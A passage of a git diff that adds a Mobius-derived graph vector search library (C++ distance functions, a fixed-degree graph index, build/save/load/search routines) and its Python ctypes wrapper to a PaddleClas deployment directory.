return_k, IndexContext* index_context,idx_t* ret_id,double* ret_score){ + int topk = 0; + int display_topk = 1; + int build_idx_offset = 0; + int query_idx_offset = 0; + + Data* data = reinterpret_cast(index_context->data); + GraphWrapper* graph = reinterpret_cast(index_context->graph); + + + //auto flag = (data==NULL); + //std::cout<> point; + point.reserve(dim); + for(int j = 0;j < dim;++j) + point.push_back(std::make_pair(j,dense_vec[j])); + std::vector topN; + std::vector score; + graph->search_top_k_with_score(point,search_budget,topN,score); + for(int i = 0;i < topN.size() && i < return_k;++i){ + ret_id[i] = topN[i]; + ret_score[i] = score[i]; + } +} + + +// For L2 index +void build_l2_index(float* dense_mat,int row,int dim, int pq_size, const char* prefix){ + std::unique_ptr data; + std::unique_ptr graph; + int topk = 0; + int display_topk = 1; + int build_idx_offset = 0; + int query_idx_offset = 0; + + data = std::unique_ptr(new Data(row,dim)); + graph = std::unique_ptr(new FixedDegreeGraph<3>(data.get())); + graph->set_construct_pq_size(pq_size); + + std::vector>>> add_buffer; + + for(int i = 0;i < row;++i){ + std::vector> point; + point.reserve(dim); + for(int j = 0;j < dim;++j) + point.push_back(std::make_pair(j,dense_mat[i * dim + j])); + data->add(i,point); + if(i < 1000){ + graph->add_vertex(i,point); + }else{ + add_buffer.push_back(std::make_pair(i,point)); + } + if(add_buffer.size() >= 1000000) + flush_add_buffer(add_buffer,graph.get()); + } + flush_add_buffer(add_buffer,graph.get()); + + std::string str = std::string(prefix); + data->dump(str + ".data"); + graph->dump(str + ".graph"); + +} + +void load_l2_index_prefix(int row,int dim,IndexContext* index_context,const char* prefix){ + std::string str = std::string(prefix); + + Data* data = new Data(row,dim); + GraphWrapper* graph = new FixedDegreeGraph<3>(data); + + //idx += build_idx_offset; + + data->load(str + ".data"); + graph->load(str + ".graph"); + + index_context->graph = graph; + 
index_context->data = data; +} + +void save_l2_index_prefix(IndexContext* index_context,const char* prefix){ + std::string str = std::string(prefix); + Data* data = (Data*)(index_context->data); + GraphWrapper* graph = (GraphWrapper*)(index_context->graph); + + data->dump(str + ".data"); + graph->dump(str + ".graph"); +} + + + +void search_l2_index(float* dense_vec,int dim,int search_budget,int return_k, IndexContext* index_context,idx_t* ret_id,double* ret_score){ + int topk = 0; + int display_topk = 1; + int build_idx_offset = 0; + int query_idx_offset = 0; + + Data* data = reinterpret_cast(index_context->data); + GraphWrapper* graph = reinterpret_cast(index_context->graph); + + std::vector> point; + point.reserve(dim); + for(int j = 0;j < dim;++j) + point.push_back(std::make_pair(j,dense_vec[j])); + std::vector topN; + std::vector score; + graph->search_top_k_with_score(point,search_budget,topN,score); + for(int i = 0;i < topN.size() && i < return_k;++i){ +// printf("%d: (%zu, %f)\n",i,topN[i],score[i]); + ret_id[i] = topN[i]; + ret_score[i] = score[i]; + } +} + + +void release_context(IndexContext* index_context){ + delete (Data*)(index_context->data); + delete (GraphWrapper*)(index_context->graph); +} + +} // extern "C" + diff --git a/Smart_container/PaddleClas/deploy/vector_search/interface.py b/Smart_container/PaddleClas/deploy/vector_search/interface.py new file mode 100644 index 0000000..8dcd86f --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/interface.py @@ -0,0 +1,272 @@ +# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""ctypes bindings for the Mobius graph-based vector search library.

Loads the prebuilt ``index.so`` (Linux) / ``index.dll`` (Windows) sitting
next to this file and exposes it through the :class:`Graph_Index` wrapper.
"""

import ctypes
import json
import os
import platform
import sys
from ctypes import POINTER, Structure, c_void_p, create_string_buffer

import numpy as np
import numpy.ctypeslib as ctl
import paddle

__dir__ = os.path.dirname(os.path.abspath(__file__))
# Python >= 3.8 on Windows needs an explicit winmode so the DLL's
# dependencies are resolved from the standard search path.
winmode = None
if platform.system() == "Windows":
    lib_filename = "index.dll"
    if sys.version_info.minor >= 8:
        winmode = 0x8
else:
    lib_filename = "index.so"
so_path = os.path.join(__dir__, lib_filename)
try:
    if winmode is not None:
        lib = ctypes.CDLL(so_path, winmode=winmode)
    else:
        lib = ctypes.CDLL(so_path)
except Exception as ex:
    readme_path = os.path.join(__dir__, "README.md")
    print(
        f"Error happened when load lib {so_path} with msg {ex},\nplease refer to {readme_path} to rebuild your library."
    )
    sys.exit(-1)


class IndexContext(Structure):
    # Mirrors the C `IndexContext { void* graph; void* data; }` handle.
    _fields_ = [("graph", c_void_p), ("data", c_void_p)]


# for mobius IP index
build_mobius_index = lib.build_mobius_index
build_mobius_index.restype = None
build_mobius_index.argtypes = [
    ctl.ndpointer(
        np.float32, flags='aligned, c_contiguous'), ctypes.c_int, ctypes.c_int,
    ctypes.c_int, ctypes.c_double, ctypes.c_char_p
]

search_mobius_index = lib.search_mobius_index
search_mobius_index.restype = None
search_mobius_index.argtypes = [
    ctl.ndpointer(
        np.float32, flags='aligned, c_contiguous'), ctypes.c_int, ctypes.c_int,
    ctypes.c_int, POINTER(IndexContext), ctl.ndpointer(
        np.uint64, flags='aligned, c_contiguous'), ctl.ndpointer(
            np.float64, flags='aligned, c_contiguous')
]

load_mobius_index_prefix = lib.load_mobius_index_prefix
load_mobius_index_prefix.restype = None
load_mobius_index_prefix.argtypes = [
    ctypes.c_int, ctypes.c_int, POINTER(IndexContext), ctypes.c_char_p
]

save_mobius_index_prefix = lib.save_mobius_index_prefix
save_mobius_index_prefix.restype = None
save_mobius_index_prefix.argtypes = [POINTER(IndexContext), ctypes.c_char_p]

# for L2 index
build_l2_index = lib.build_l2_index
build_l2_index.restype = None
build_l2_index.argtypes = [
    ctl.ndpointer(
        np.float32, flags='aligned, c_contiguous'), ctypes.c_int, ctypes.c_int,
    ctypes.c_int, ctypes.c_char_p
]

search_l2_index = lib.search_l2_index
search_l2_index.restype = None
search_l2_index.argtypes = [
    ctl.ndpointer(
        np.float32, flags='aligned, c_contiguous'), ctypes.c_int, ctypes.c_int,
    ctypes.c_int, POINTER(IndexContext), ctl.ndpointer(
        np.uint64, flags='aligned, c_contiguous'), ctl.ndpointer(
            np.float64, flags='aligned, c_contiguous')
]

load_l2_index_prefix = lib.load_l2_index_prefix
load_l2_index_prefix.restype = None
load_l2_index_prefix.argtypes = [
    ctypes.c_int, ctypes.c_int, POINTER(IndexContext), ctypes.c_char_p
]

save_l2_index_prefix = lib.save_l2_index_prefix
save_l2_index_prefix.restype = None
save_l2_index_prefix.argtypes = [POINTER(IndexContext), ctypes.c_char_p]

release_context = lib.release_context
release_context.restype = None
release_context.argtypes = [POINTER(IndexContext)]


class Graph_Index(object):
    """
    graph index

    Wraps the native Mobius graph index. Supports inner-product ("IP") and
    "L2" distances; gallery/query vectors may be numpy float32 arrays or
    paddle tensors (tensors are converted via ``.numpy()``).
    """

    def __init__(self, dist_type="IP"):
        self.dim = 0
        self.total_num = 0
        self.dist_type = dist_type
        self.mobius_pow = 2.0
        self.index_context = IndexContext(0, 0)
        self.gallery_doc_dict = {}
        self.with_attr = False
        assert dist_type in ["IP", "L2"], "Only support IP and L2 distance ..."

    def build(self,
              gallery_vectors,
              gallery_docs=None,
              pq_size=100,
              index_path='graph_index/',
              append_index=False):
        """
        build index

        Args:
            gallery_vectors: 2-D float32 array of shape (num, dim).
            gallery_docs: optional per-row labels; when given, its length
                must equal the number of gallery vectors.
            pq_size: priority-queue size used during graph construction.
            index_path: directory the index files are written to.
            append_index: when True, merge the new docs into an existing
                info.json instead of overwriting it.
        """
        # Avoid a mutable default argument; None means "no docs".
        if gallery_docs is None:
            gallery_docs = []
        if paddle.is_tensor(gallery_vectors):
            gallery_vectors = gallery_vectors.numpy()
        assert gallery_vectors.ndim == 2, "Input vector must be 2D ..."

        self.total_num = gallery_vectors.shape[0]
        self.dim = gallery_vectors.shape[1]

        assert (len(gallery_docs) == self.total_num
                if len(gallery_docs) > 0 else True)

        print("training index -> num: {}, dim: {}, dist_type: {}".format(
            self.total_num, self.dim, self.dist_type))

        if not os.path.exists(index_path):
            os.makedirs(index_path)

        # Build on disk, then immediately load so the context is usable.
        if self.dist_type == "IP":
            build_mobius_index(
                gallery_vectors, self.total_num, self.dim, pq_size,
                self.mobius_pow,
                create_string_buffer((index_path + "/index").encode('utf-8')))
            load_mobius_index_prefix(
                self.total_num, self.dim,
                ctypes.byref(self.index_context),
                create_string_buffer((index_path + "/index").encode('utf-8')))
        else:
            build_l2_index(
                gallery_vectors, self.total_num, self.dim, pq_size,
                create_string_buffer((index_path + "/index").encode('utf-8')))
            load_l2_index_prefix(
                self.total_num, self.dim,
                ctypes.byref(self.index_context),
                create_string_buffer((index_path + "/index").encode('utf-8')))

        self.gallery_doc_dict = {}
        if len(gallery_docs) > 0:
            self.with_attr = True
            for i in range(gallery_vectors.shape[0]):
                self.gallery_doc_dict[str(i)] = gallery_docs[i]

        self.gallery_doc_dict["total_num"] = self.total_num
        self.gallery_doc_dict["dim"] = self.dim
        self.gallery_doc_dict["dist_type"] = self.dist_type
        self.gallery_doc_dict["with_attr"] = self.with_attr

        output_path = os.path.join(index_path, "info.json")
        if append_index is True and os.path.exists(output_path):
            with open(output_path, "r") as fin:
                lines = fin.readlines()[0]
                ori_gallery_doc_dict = json.loads(lines)
            # The appended docs must be compatible with the existing index.
            assert ori_gallery_doc_dict["dist_type"] == self.gallery_doc_dict[
                "dist_type"]
            assert ori_gallery_doc_dict["dim"] == self.gallery_doc_dict["dim"]
            assert ori_gallery_doc_dict["with_attr"] == self.gallery_doc_dict[
                "with_attr"]
            offset = ori_gallery_doc_dict["total_num"]
            for i in range(0, self.gallery_doc_dict["total_num"]):
                ori_gallery_doc_dict[str(i + offset)] = self.gallery_doc_dict[
                    str(i)]

            ori_gallery_doc_dict["total_num"] += self.gallery_doc_dict[
                "total_num"]
            self.gallery_doc_dict = ori_gallery_doc_dict
        with open(output_path, "w") as f:
            json.dump(self.gallery_doc_dict, f)

        print("finished creating index ...")

    def search(self, query, return_k=10, search_budget=100):
        """
        search

        Args:
            query: 1-D float32 vector of length ``self.dim``.
            return_k: number of neighbours to return.
            search_budget: graph-traversal budget (larger = more accurate).

        Returns:
            (scores, docs) when the index was built with gallery_docs,
            otherwise (scores, ids).
        """
        ret_id = np.zeros(return_k, dtype=np.uint64)
        ret_score = np.zeros(return_k, dtype=np.float64)

        if paddle.is_tensor(query):
            query = query.numpy()
        if self.dist_type == "IP":
            search_mobius_index(query, self.dim, search_budget, return_k,
                                ctypes.byref(self.index_context), ret_id,
                                ret_score)
        else:
            search_l2_index(query, self.dim, search_budget, return_k,
                            ctypes.byref(self.index_context), ret_id,
                            ret_score)

        ret_id = ret_id.tolist()
        ret_doc = []
        if self.with_attr:
            for i in range(return_k):
                ret_doc.append(self.gallery_doc_dict[str(ret_id[i])])
            return ret_score, ret_doc
        else:
            return ret_score, ret_id

    def dump(self, index_path):
        """Persist the native index and the doc mapping to ``index_path``."""
        if not os.path.exists(index_path):
            os.makedirs(index_path)

        if self.dist_type == "IP":
            save_mobius_index_prefix(
                ctypes.byref(self.index_context),
                create_string_buffer((index_path + "/index").encode('utf-8')))
        else:
            save_l2_index_prefix(
                ctypes.byref(self.index_context),
                create_string_buffer((index_path + "/index").encode('utf-8')))

        with open(os.path.join(index_path, "info.json"), "w") as f:
            json.dump(self.gallery_doc_dict, f)

    def load(self, index_path):
        """Load a previously dumped index from ``index_path``."""
        self.gallery_doc_dict = {}

        with open(os.path.join(index_path, "info.json"), "r") as f:
            self.gallery_doc_dict = json.load(f)

        self.total_num = self.gallery_doc_dict["total_num"]
        self.dim = self.gallery_doc_dict["dim"]
        self.dist_type = self.gallery_doc_dict["dist_type"]
        self.with_attr = self.gallery_doc_dict["with_attr"]

        if self.dist_type == "IP":
            load_mobius_index_prefix(
                self.total_num, self.dim,
                ctypes.byref(self.index_context),
                create_string_buffer((index_path + "/index").encode('utf-8')))
        else:
            load_l2_index_prefix(
                self.total_num, self.dim,
                ctypes.byref(self.index_context),
                create_string_buffer((index_path + "/index").encode('utf-8')))
Software. + +//THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +//IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +//FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +//AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +//LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +//OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +//SOFTWARE. + + +//from https://github.com/sunbelbd/mobius/blob/e2d166547d61d791da8f06747a63b9cd38f02c71/config.h + +#pragma once + + +typedef float value_t; +//typedef double dist_t; +typedef float dist_t; +typedef size_t idx_t; +typedef int UINT; + + +#define ACC_BATCH_SIZE 4096 +#define FIXED_DEGREE 31 +#define FIXED_DEGREE_SHIFT 5 + + +//for construction +#define SEARCH_DEGREE 15 +#define CONSTRUCT_SEARCH_BUDGET 150 diff --git a/Smart_container/PaddleClas/deploy/vector_search/src/data.h b/Smart_container/PaddleClas/deploy/vector_search/src/data.h new file mode 100644 index 0000000..ea65e70 --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/src/data.h @@ -0,0 +1,365 @@ +//MIT License +// +//Copyright (c) 2021 Mobius Authors + +//Permission is hereby granted, free of charge, to any person obtaining a copy +//of this software and associated documentation files (the "Software"), to deal +//in the Software without restriction, including without limitation the rights +//to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +//copies of the Software, and to permit persons to whom the Software is +//furnished to do so, subject to the following conditions: + +//The above copyright notice and this permission notice shall be included in all +//copies or substantial portions of the Software. 
+ +//THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +//IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +//FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +//AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +//LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +//OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +//SOFTWARE. + +//from https://github.com/sunbelbd/mobius/blob/e2d166547d61d791da8f06747a63b9cd38f02c71/data.h + +#pragma once + +#include +#include +#include + +#include"config.h" + +#define ZERO_EPS 1e-10 + +#define _SCALE_WORLD_DENSE_DATA + +#ifdef _SCALE_WORLD_DENSE_DATA +//dense data +class Data{ +private: + std::unique_ptr data; + size_t num; + size_t curr_num = 0; + int dim; + +public: + value_t mobius_pow = 2; + value_t max_ip_norm = 1; + value_t max_ip_norm2 = 1; + + Data(size_t num, int dim) : num(num),dim(dim){ + data = std::unique_ptr(new value_t[num * dim]); + memset(data.get(),0,sizeof(value_t) * num * dim); + } + + value_t* get(idx_t idx) const{ + return data.get() + idx * dim; + } + + template + dist_t ipwrap_l2_query_distance(idx_t a,T& v) const{ + auto pa = get(a); + dist_t ret = 0; + dist_t normu = 0; + for(int i = 0;i < dim;++i){ + auto diff = (*(pa + i) / max_ip_norm) - v[i]; + ret += diff * diff; + normu += (*(pa + i)) * (*(pa + i)); + } + ret += 1 - normu / max_ip_norm2; + return ret; + } + + template + dist_t ipwrap_l2_build_distance(idx_t a,T& v) const{ + auto pa = get(a); + dist_t ret = 0; + dist_t normu = 0; + dist_t normv = 0; + for(int i = 0;i < dim;++i){ + auto diff = *(pa + i) - v[i]; + ret += diff * diff; + normu += (*(pa + i)) * (*(pa + i)); + normv += v[i] * v[i]; + } + dist_t wrap_termu = sqrt(1 - normu / max_ip_norm2); + dist_t wrap_termv = sqrt(1 - normv / max_ip_norm2); + dist_t diff_wrap = wrap_termu - wrap_termv; + ret = ret / max_ip_norm2 + diff_wrap * diff_wrap; 
+ return ret; + } + + template + dist_t l2_distance(idx_t a,T& v) const{ + auto pa = get(a); + dist_t ret = 0; + for(int i = 0;i < dim;++i){ + auto diff = *(pa + i) - v[i]; + ret += diff * diff; + } + return ret; + } + + template + dist_t negative_inner_prod_distance(idx_t a,T& v) const{ + auto pa = get(a); + dist_t ret = 0; + for(int i = 0;i < dim;++i){ + ret -= (*(pa + i)) * v[i]; + } + return ret; + } + + template + dist_t negative_cosine_distance(idx_t a,T& v) const{ + auto pa = get(a); + dist_t ret = 0; + value_t lena = 0,lenv = 0; + for(int i = 0;i < dim;++i){ + ret += (*(pa + i)) * v[i]; + lena += (*(pa + i)) * (*(pa + i)); + lenv += v[i] * v[i]; + } + int sign = ret < 0 ? 1 : -1; +// return sign * (ret * ret / lena);// / lenv); + return sign * (ret * ret / lena / lenv); + } + + template + dist_t mobius_l2_distance(idx_t a,T& v) const{ + auto pa = get(a); + dist_t ret = 0; + value_t lena = 0,lenv = 0; + for(int i = 0;i < dim;++i){ + lena += (*(pa + i)) * (*(pa + i)); + lenv += v[i] * v[i]; + } + value_t modifier_a = pow(lena,0.5 * mobius_pow); + value_t modifier_v = pow(lenv,0.5 * mobius_pow); + if(fabs(modifier_a) < ZERO_EPS) + modifier_a = 1; + if(fabs(modifier_v) < ZERO_EPS) + modifier_v = 1; + for(int i = 0;i < dim;++i){ + value_t tmp = (*(pa + i)) / modifier_a - v[i] / modifier_v; + ret += tmp * tmp; + } + return ret; + } + + template + dist_t real_nn(T& v) const{ + dist_t minn = 1e100; + for(size_t i = 0;i < curr_num;++i){ + auto res = l2_distance(i,v); + if(res < minn){ + minn = res; + } + } + return minn; + } + + std::vector organize_point_mobius(const std::vector>& v){ + std::vector ret(dim,0); + value_t lena = 0; + for(const auto& p : v){ +// ret[p.first] = p.second; + lena += p.second * p.second; + } + value_t modifier_a = pow(lena,0.5 * mobius_pow); + if(fabs(modifier_a) < ZERO_EPS) + modifier_a = 1; + for(const auto& p : v){ + ret[p.first] = p.second / modifier_a; + } + return std::move(ret); + } + + std::vector organize_point(const 
std::vector>& v){ + std::vector ret(dim,0); + for(const auto& p : v){ + if(p.first >= dim) + printf("error %d %d\n",p.first,dim); + ret[p.first] = p.second; + } + return std::move(ret); + } + + value_t vec_sum2(const std::vector>& v){ + value_t ret = 0; + for(const auto& p : v){ + if(p.first >= dim) + printf("error %d %d\n",p.first,dim); + ret += p.second * p.second; + } + return std::move(ret); + } + + + void add(idx_t idx, std::vector>& value){ + //printf("adding %zu\n",idx); + //for(auto p : value) + // printf("%zu %d %f\n",idx,p.first,p.second); + curr_num = std::max(curr_num,idx); + auto p = get(idx); + for(const auto& v : value) + *(p + v.first) = v.second; + } + + void add_mobius(idx_t idx, std::vector>& value){ + //printf("adding %zu\n",idx); + //for(auto p : value) + // printf("%zu %d %f\n",idx,p.first,p.second); + curr_num = std::max(curr_num,idx); + auto p = get(idx); + value_t lena = 0; + for(const auto& v : value){ + *(p + v.first) = v.second; + lena += v.second * v.second; + } + value_t modifier_a = pow(lena,0.5 * mobius_pow); + if(fabs(modifier_a) < ZERO_EPS) + modifier_a = 1; + for(const auto& v : value){ + *(p + v.first) = v.second / modifier_a; + } + } + + inline size_t max_vertices(){ + return num; + } + + inline size_t curr_vertices(){ + return curr_num; + } + + void print(){ + for(int i = 0;i < num && i < 10;++i) + printf("%f ",*(data.get() + i)); + printf("\n"); + } + + int get_dim(){ + return dim; + } + + void dump(std::string path = "bfsg.data"){ + FILE* fp = fopen(path.c_str(),"wb"); + fwrite(data.get(),sizeof(value_t) * num * dim,1,fp); + fclose(fp); + } + + void load(std::string path = "bfsg.data"){ + curr_num = num; + FILE* fp = fopen(path.c_str(),"rb"); + auto cnt = fread(data.get(),sizeof(value_t) * num * dim,1,fp); + fclose(fp); + } + +}; +template<> +dist_t Data::ipwrap_l2_build_distance(idx_t a,idx_t& b) const{ + auto pa = get(a); + auto pb = get(b); + dist_t ret = 0; + dist_t normu = 0; + dist_t normv = 0; + for(int i = 0;i < 
dim;++i){ + auto diff = *(pa + i) - *(pb + i); + ret += diff * diff; + normu += (*(pa + i)) * (*(pa + i)); + normv += (*(pb + i)) * (*(pb + i)); + } + dist_t wrap_termu = sqrt(1 - normu / max_ip_norm2); + dist_t wrap_termv = sqrt(1 - normv / max_ip_norm2); + dist_t diff_wrap = wrap_termu - wrap_termv; + ret = ret / max_ip_norm2 + diff_wrap * diff_wrap; + return ret; +} +template<> +dist_t Data::ipwrap_l2_query_distance(idx_t a,idx_t& b) const{ + auto pa = get(a); + auto pb = get(b); + dist_t ret = 0; + dist_t normu = 0; + for(int i = 0;i < dim;++i){ + auto diff = (*(pa + i) / max_ip_norm) - *(pb + i); + ret += diff * diff; + normu += (*(pa + i)) * (*(pa + i)); + } + ret += 1 - normu / max_ip_norm2; + return ret; +} +template<> +dist_t Data::l2_distance(idx_t a,idx_t& b) const{ + auto pa = get(a), + pb = get(b); + dist_t ret = 0; + for(int i = 0;i < dim;++i){ + auto diff = *(pa + i) - *(pb + i); + ret += diff * diff; + } + return ret; +} + +template<> +dist_t Data::negative_inner_prod_distance(idx_t a,idx_t& b) const{ + auto pa = get(a), + pb = get(b); + dist_t ret = 0; + for(int i = 0;i < dim;++i){ + ret -= (*(pa + i)) * (*(pb + i)); + } + return ret; +} + +template<> +dist_t Data::negative_cosine_distance(idx_t a,idx_t& b) const{ + auto pa = get(a), + pb = get(b); + dist_t ret = 0; + value_t lena = 0,lenv = 0; + for(int i = 0;i < dim;++i){ + ret += (*(pa + i)) * (*(pb + i)); + lena += (*(pa + i)) * (*(pa + i)); + lenv += (*(pb + i)) * (*(pb + i)); + } + int sign = ret < 0 ? 
1 : -1; +// return sign * (ret * ret / lena); + return sign * (ret * ret / lena / lenv); +} + +template<> +dist_t Data::mobius_l2_distance(idx_t a,idx_t& b) const{ + auto pa = get(a), + pb = get(b); + dist_t ret = 0; + value_t lena = 0,lenv = 0; + for(int i = 0;i < dim;++i){ + lena += (*(pa + i)) * (*(pa + i)); + lenv += (*(pb + i)) * (*(pb + i)); + } + value_t modifier_a = pow(lena,0.5 * mobius_pow); + value_t modifier_v = pow(lenv,0.5 * mobius_pow); + if(fabs(modifier_a) < ZERO_EPS) + modifier_a = 1; + if(fabs(modifier_v) < ZERO_EPS) + modifier_v = 1; + for(int i = 0;i < dim;++i){ + value_t tmp = (*(pa + i)) / modifier_a - (*(pb + i)) / modifier_v; + ret += tmp * tmp; + } + return ret; +} + +#else +//sparse data +class Data{ +public: + //TODO + +}; +#endif + + diff --git a/Smart_container/PaddleClas/deploy/vector_search/src/graph.h b/Smart_container/PaddleClas/deploy/vector_search/src/graph.h new file mode 100644 index 0000000..d54353b --- /dev/null +++ b/Smart_container/PaddleClas/deploy/vector_search/src/graph.h @@ -0,0 +1,636 @@ +//MIT License +// +//Copyright (c) 2021 Mobius Authors + +//Permission is hereby granted, free of charge, to any person obtaining a copy +//of this software and associated documentation files (the "Software"), to deal +//in the Software without restriction, including without limitation the rights +//to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +//copies of the Software, and to permit persons to whom the Software is +//furnished to do so, subject to the following conditions: + +//The above copyright notice and this permission notice shall be included in all +//copies or substantial portions of the Software. + +//THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +//IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +//FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +//AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +//LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +//OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +//SOFTWARE. + +//from https://github.com/sunbelbd/mobius/blob/e2d166547d61d791da8f06747a63b9cd38f02c71/graph.h + + +#pragma once +#include +#include +#include +#include +#include +#include +#include +#include + +#include"config.h" +#include"data.h" + +#ifdef OMP +#include +#endif + +typedef unsigned int vl_type; + +class VisitedList { +public: + vl_type curV; + vl_type *mass; + unsigned int numelements; + + VisitedList(int numelements1) { + curV = 1; + numelements = numelements1; + mass = new vl_type[numelements]; + memset(mass, 0, sizeof(vl_type) * numelements); + } + + void reset() { + ++curV; + if (curV == 0) { + curV = 1; + memset(mass, 0, sizeof(vl_type) * numelements); + } + }; + + ~VisitedList() { delete mass; } +}; + +struct GraphMeasures{ + int distance_cnt = 0; +}; + +class GraphWrapper{ +public: + virtual void add_vertex(idx_t vertex_id,std::vector>& point) = 0; + virtual void add_vertex_lock(idx_t vertex_id,std::vector>& point) = 0; + virtual void search_top_k(const std::vector>& query,int k,std::vector& result) = 0; + virtual void search_top_k_with_score(const std::vector>& query,int k,std::vector& result,std::vector& score){} + + virtual void dump(std::string path = "bfsg.graph") = 0; + virtual void load(std::string path = "bfsg.graph") = 0; + virtual ~GraphWrapper(){} + virtual void set_construct_pq_size(int size){}; + GraphMeasures measures; +}; + +template +class FixedDegreeGraph : public GraphWrapper{ +private: + const int degree = SEARCH_DEGREE; + const int flexible_degree = FIXED_DEGREE; + const int vertex_offset_shift = FIXED_DEGREE_SHIFT; + std::vector edges; + std::vector edge_dist; + Data* data; + std::mt19937_64 rand_gen = std::mt19937_64(1234567);//std::random_device{}()); + 
std::vector edge_mutex;//do not push back on this vector, it will destroy the mutex + + bool debug = false; + VisitedList* p_visited = NULL; + #ifdef OMP + std::vector visited_pool; + #endif + int construct_pq_size = CONSTRUCT_SEARCH_BUDGET; + + + void rank_and_switch_ordered(idx_t v_id,idx_t u_id){ + //We assume the neighbors of v_ids in edges[offset] are sorted + //by the distance to v_id ascendingly when it is full + //NOTICE: before it is full, it is unsorted + auto curr_dist = pair_distance(v_id,u_id); + auto offset = ((size_t)v_id) << vertex_offset_shift; + int degree = edges[offset]; + std::vector neighbor; + neighbor.reserve(degree + 1); + for(int i = 0;i < degree;++i) + neighbor.push_back(edges[offset + i + 1]); + neighbor.push_back(u_id); + neighbor = edge_selection_filter_neighbor(neighbor,v_id,flexible_degree); + edges[offset] = neighbor.size(); + for(int i = 0;i < neighbor.size();++i) + edges[offset + i + 1] = neighbor[i]; + return; + //We assert edges[offset] > 0 here + if(curr_dist >= edge_dist[offset + edges[offset]]){ + return; + } + edges[offset + edges[offset]] = u_id; + edge_dist[offset + edges[offset]] = curr_dist; + for(size_t i = offset + edges[offset] - 1;i > offset;--i){ + if(edge_dist[i] > edge_dist[i + 1]){ + std::swap(edges[i],edges[i + 1]); + std::swap(edge_dist[i],edge_dist[i + 1]); + }else{ + break; + } + } + } + + void rank_and_switch(idx_t v_id,idx_t u_id){ + rank_and_switch_ordered(v_id,u_id); + //TODO: + //Implement an unordered version to compare with + } + + template + dist_t distance(idx_t a,T& b){ + if(dist_type == 0) + return data->l2_distance(a,b); + else if(dist_type == 1) + return data->negative_inner_prod_distance(a,b); + else if(dist_type == 2) + return data->negative_cosine_distance(a,b); + else if(dist_type == 3) + return data->l2_distance(a,b); + else if(dist_type == 4) + return data->ipwrap_l2_build_distance(a,b); + else if(dist_type == 5) + return data->ipwrap_l2_query_distance(a,b); + else{ + // should not happen + 
fprintf(stderr,"unsupported dist_type %d\n",dist_type); + return 0; + } + } + + void compute_distance_naive(size_t offset,std::vector& dists){ + dists.resize(edges[offset]); + auto degree = edges[offset]; + for(int i = 0;i < degree;++i){ + dists[i] = distance(offset >> vertex_offset_shift,edges[offset + i + 1]); + } + } + + void compute_distance(size_t offset,std::vector& dists){ + compute_distance_naive(offset,dists); + } + + template + dist_t pair_distance_naive(idx_t a,T& b){ + ++measures.distance_cnt; + return distance(a,b); + } + + template + dist_t pair_distance(idx_t a,T& b){ + return pair_distance_naive(a,b); + } + + + void qsort(size_t l,size_t r){ + auto mid = (l + r) >> 1; + int i = l,j = r; + auto k = edge_dist[mid]; + do{ + while(edge_dist[i] < k) ++i; + while(k < edge_dist[j]) --j; + if(i <= j){ + std::swap(edge_dist[i],edge_dist[j]); + std::swap(edges[i],edges[j]); + ++i; + --j; + } + }while(i <= j); + if(i < r)qsort(i,r); + if(l < j)qsort(l,j); + } + + void rank_edges(size_t offset){ + std::vector dists; + compute_distance(offset,dists); + for(int i = 0;i < dists.size();++i) + edge_dist[offset + i + 1] = dists[i]; + qsort(offset + 1,offset + dists.size()); + //TODO: + //use a heap in the edge_dist + } + + void add_edge_lock(idx_t v_id,idx_t u_id){ + edge_mutex[v_id].lock(); + auto offset = ((size_t)v_id) << vertex_offset_shift; + if(edges[offset] < flexible_degree){ + ++edges[offset]; + edges[offset + edges[offset]] = u_id; + }else{ + rank_and_switch(v_id,u_id); + } + edge_mutex[v_id].unlock(); + } + + void add_edge(idx_t v_id,idx_t u_id){ + auto offset = ((size_t)v_id) << vertex_offset_shift; + if(edges[offset] < flexible_degree){ + ++edges[offset]; + edges[offset + edges[offset]] = u_id; + }else{ + rank_and_switch(v_id,u_id); + } + } + +public: + long long total_explore_cnt = 0; + int total_explore_times = 0; + + size_t search_start_point = 0; + bool ignore_startpoint = false; + + FixedDegreeGraph(Data* data) : data(data){ + auto 